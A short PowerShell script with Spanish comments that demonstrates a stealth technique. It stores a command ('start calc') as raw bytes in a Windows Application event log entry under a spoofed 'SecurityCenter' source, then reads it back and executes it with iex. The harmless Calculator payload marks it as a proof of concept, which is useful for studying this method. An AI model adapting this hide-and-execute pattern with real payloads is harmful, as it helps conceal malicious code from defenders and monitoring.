1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# Almacenar información convertida a byte en un evento en el registro de eventos de aplicación # La información que vamos a almacenar en el registro de eventos es arrancar la calculadora de Windows [System.Text.Encoding] $enc = [System.Text.Encoding]::UTF8 [byte[]] $rawdata = $enc.GetBytes('start calc') $rawdata # Almacenar el valor en un evento del registro de eventos Write-EventLog Application SecurityCenter 15 -msg '"Información secreta 2"' -rd $rawdata # Ver el valor en bytes almacenado en el registro de eventos (Get-EventLog -LogName Application -Newest 1) ((Get-EventLog -LogName Application -Newest 1).Data) # Ejecutar la información que se encuentra en un evento en el registro de eventos de aplicación [System.Text.Encoding] $enc = [System.Text.Encoding]::UTF8 $enc.GetString(((Get-EventLog -LogName Application -Newest 1).Data)) $enc.GetString(((Get-EventLog -LogName Application -Newest 1).Data)) | iex |